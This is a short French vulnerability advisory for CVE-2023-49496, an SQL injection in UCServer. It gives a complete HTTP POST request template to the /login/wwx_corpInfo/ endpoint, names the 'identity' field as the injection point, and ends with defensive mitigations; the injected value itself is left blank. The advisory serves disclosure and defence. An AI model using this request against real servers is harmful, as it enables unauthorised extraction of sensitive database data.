
Exploit de preuve de concept pour CVE-2023-49496, démontrant une injection SQL dans UCServer via le point de terminaison /login/wwx_corpInfo/ pour extraire des informations sensibles de la base de données.
UCServer est un serveur de communications unifiées avancé. La société Shanghai Shupin Information Technology Co., Ltd. présente une vulnérabilité d'injection SQL dans son UCServer, qu'un attaquant peut exploiter pour obtenir des informations sensibles de la base de données.
POST /login/wwx_corpInfo/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://example.com/
Content-Length: 132
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: example.com
Proxy-Connection: Keep-alive
&identity=
Dans le corps de la requête POST, "identity" est le point d'injection

Activer le pare-feu du site ; interdire à toute adresse IP d'accéder au chemin "/login/wwx_corpInfo/" ; interdire à la base de données d'accepter les connexions externes à distance ; mettre à niveau la version de la base de données.